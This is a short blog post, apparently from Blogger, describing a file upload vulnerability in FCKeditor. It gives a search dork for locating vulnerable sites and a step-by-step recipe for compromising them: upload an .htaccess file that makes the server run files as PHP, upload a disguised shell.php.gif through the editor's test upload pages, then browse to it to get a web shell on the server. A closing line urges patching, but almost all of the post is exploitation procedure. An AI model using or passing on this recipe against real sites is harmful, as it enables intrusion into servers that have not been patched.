All version of FCKeditor File Upload Vulnerability. 


inurl:FCKeditor/editor/

Demo:


Demo1

Demo2

Demo3




1.create a htaccess file:
code:

SetHandler application/x-httpd-php

2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.Now upload shell.php.gif with FCKeditor.

4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.

5.http://target.com/anything/shell_php.gif

6.Now shell is available from server.
 Please PATCH it ASAP.

Powered by Blogger.